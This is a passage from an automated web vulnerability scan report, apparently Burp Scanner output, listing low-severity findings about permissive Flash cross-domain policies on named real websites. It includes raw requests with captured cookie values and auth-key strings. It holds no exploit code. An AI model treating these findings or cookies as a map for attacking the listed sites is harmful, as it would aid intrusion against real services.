<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.101. http://pi.pardot.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pi.pardot.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pi.pardot.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:03 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 16:22:18 GMT
ETag: "e5"
Accept-Ranges: bytes
Content-Length: 229
Cache-Control: max-age=63072000
Expires: Thu, 05 Sep 2013 15:32:03 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml
X-Pardot-LB: lb-d2
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pardot.com" />
<allow-access-from domain="*.visual.force.com" />
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...

4.102. http://quote.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://quote.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: quote.cnbc.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 06 Sep 2011 14:56:38 GMT
Via: 1.1 C aicache6
Content-Length: 245
X-Aicache-OS: 64.210.195.136:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Wed, 07 Sep 2011 14:56:39 GMT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.103. http://rd.rlcdn.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://rd.rlcdn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 500
Last-Modified: Mon, 05 Sep 2011 19:31:28 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.casualcollective.com" />
<allow-access-from domain="*.tubemogul.com" />
<allow-access-from domain="*.inplay.tubemogul.com" />
<allow-access-from domain="*.grooveshark.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adotube.com" />
...[SNIP]...

4.104. http://search.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://search.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: search.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:01 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Mon, 18 Oct 2010 20:53:56 GMT
ETag: "f5-492ea5fe9c100"
Accept-Ranges: bytes
Content-Type: application/xml
Via: 1.1 aicache6
Content-Length: 245
X-Aicache-OS: 64.210.194.246:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.105. http://server.iad.liveperson.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://server.iad.liveperson.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:100b"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

4.106. http://snas.nbcuni.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: snas.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT
ETag: "2c9cd-58b-4979f4b136880"
Accept-Ranges: bytes
Content-Length: 1419
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:00:39 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*.ivillage.com" /><allow-access-from domain="*.nbbcdev.com" /><allow-access-from domain="*.bravotv.com" /><allow-access-from domain="*.console.net" /><allow-access-from domain="*.digphilly.com"/><allow-access-from domain="*.nbc10rss.com"/><allow-access-from domain="*.nbc10.com"/><allow-access-from domain="*.scifi.com"/><allow-access-from domain="*.weatherplus.com" /><allow-access-from domain="*.nbcuxd.com" /><allow-access-from domain="vplayer-preview-dev.nbcuni.ge.com" /><allow-access-from domain="*.industrynext.com"/><allow-access-from domain="*.nbcuni.com"/><allow-access-from domain="widgets.nbcuni.com"/><allow-access-from domain="*.nbc.com"/><allow-access-from domain="*.thetonightshowwithconan.com"/><allow-access-from domain="*.tonightshowwithconanobrien.com"/><allow-access-from domain="*.thetonightshowwithconanobrien.com"/><allow-access-from domain="*.tonightshow.com" /><allow-access-from domain="*.tonightshowwithconan.com" /><allow-access-from domain="*.latenightwithjimmyfallon.com" /><allow-access-from domain="*.ingaylewetrust.com" /><allow-access-from domain="*.thejaylenoshow.com" /><allow-access-from domain="127.0.0.1"/><allow-access-from domain="localhost"/><allow-access-from domain="*.sudjam.com"/>
...[SNIP]...

4.107. https://support.oracle.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://support.oracle.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: support.oracle.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:15 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Sat, 13 Aug 2011 04:17:35 GMT
ETag: "1827ecc-f6-4aa5b4f3d35c0"
Accept-Ranges: bytes
Content-Length: 246
Vary: Accept-Encoding
Cache-Control: no-store,max-age=0,must-revalidate
Keep-Alive: timeout=15, max=1799
Connection: close
Content-Type: application/xml
Content-Language: en

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.oracle.com" secure="true" />
<allow-http-request-headers-from domain="*.oracle.com" secure="true" headers="ORA_MOS_LOC
...[SNIP]...

4.108. http://symlookup.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://symlookup.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: symlookup.cnbc.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339024957; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.27
Content-Type: application/xml
Content-Length: 299
X-Aicache-OS: 64.210.193.218:80
Expires: Tue, 06 Sep 2011 15:02:33 GMT
Date: Tue, 06 Sep 2011 14:57:09 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.109. http://videometa.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://videometa.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: videometa.cnbc.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.27
Content-Type: application/xml
Content-Length: 462
X-Aicache-OS: 64.210.193.215:80
Cache-Control: max-age=600
Expires: Tue, 06 Sep 2011 15:06:36 GMT
Date: Tue, 06 Sep 2011 14:56:36 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="video.nbcuni.com" />
<allow-access-from domain="*.video.nbcuni.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="*.widgets.nbcuni.com" />
...[SNIP]...

4.110. http://w.sharethis.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://w.sharethis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Accept-Ranges: bytes
Date: Tue, 06 Sep 2011 16:46:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.111. http://wd.sharethis.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wd.sharethis.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 15:32:10 GMT
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.112. http://www.apture.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.apture.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apture.com

Response

HTTP/1.0 200 OK
Last-Modified: Sat, 03 Sep 2011 01:16:29 GMT
Content-Length: 366
Content-Type: text/xml
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:33:01 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.apture.com" />
<allow-access-from domain="*.sharlinx.com" />
<allow-access-from domain="apture.com" />
<allow-access-from domain="sharlinx.com" />
...[SNIP]...

4.113. http://www.atg.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.atg.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:33:33 GMT
ETag: "6009a-128-48bbf4a92ed40"
Pragma: no-cache
Content-Type: text/xml
Cache-Control: private, no-cache, no-store, no-transform, proxy-revalidate
Date: Tue, 06 Sep 2011 15:32:21 GMT
Content-Length: 296
Connection: close

<?xml version="1.0" ?>

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.atg.com"/>
<
...[SNIP]...

4.114. https://www.atg.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.atg.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:33:33 GMT
ETag: "6009a-128-48bbf4a92ed40"
Pragma: no-cache
Content-Type: text/xml
Cache-Control: private, no-cache, no-store, no-transform, proxy-revalidate
Date: Tue, 06 Sep 2011 15:37:32 GMT
Content-Length: 296
Connection: close

<?xml version="1.0" ?>

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.atg.com"/>
<
...[SNIP]...

4.115. http://www.cnbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://media.cnbc.com/i/CNBC/Components/Promos/_app/promoBox_noBevelAuto.swf?delay=0&config=24596694&v=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; xaikeeperua=yes; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; s_cc=true; s_sq=%5B%5BB%5D%5D; adops_master_kvs=; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:55 GMT
Via: 1.1 C aicache6
Content-Length: 3839
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:55 GMT

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
...[SNIP]...
<allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.116. http://www.csc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.csc.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:42 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:38:44 GMT
Accept-Ranges: bytes
Content-Length: 256
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:57:42 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.csc.com" />
<allow-access-from domain="assets1.csc.com" />
...[SNIP]...

4.117. http://www.deloitte.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.deloitte.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sat, 09 Jul 2011 09:03:24 GMT
Accept-Ranges: bytes
ETag: "3d5248f173ecc1:e97"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:56:56 GMT
Content-Length: 195
Connection: close

...<cross-domain-policy>
   <allow-access-from domain="*.deloitte.com" />
   <allow-access-from domain="*.tohmatsu.com" />
   <allow-access-from domain="*.brightcove.com" />
</cross-domain-policy>

4.118. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.80.38
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.119. http://www.fetchback.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.fetchback.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 30 Apr 2010 21:39:42 GMT
Accept-Ranges: bytes
Content-Length: 328
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 15:00:16 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<allow-access-from domain="*.fetchback.com" to-ports="80" />
...[SNIP]...

4.120. http://www.marykay.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marykay.com

Response

HTTP/1.1 200 OK
Content-Length: 142
Content-Type: text/xml
Last-Modified: Thu, 02 Jun 2011 09:18:10 GMT
Accept-Ranges: bytes
ETag: "33c39dfd521cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=964365EE47EE74B09594D9AC3B884E28; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Connection: close
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:45 GMT; path=/

<cross-domain-policy>
<allow-access-from domain="*.ai-media.com" />
<allow-access-from domain="*.marykay.com" />
</cross-domain-policy>

4.121. http://www.msnbc.msn.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: www.msnbc.msn.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; Sample=3; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 3839
Cache-Control: max-age=86
Expires: Tue, 06 Sep 2011 15:07:00 GMT
Date: Tue, 06 Sep 2011 15:05:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

<?xml version="1.0"?>

<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
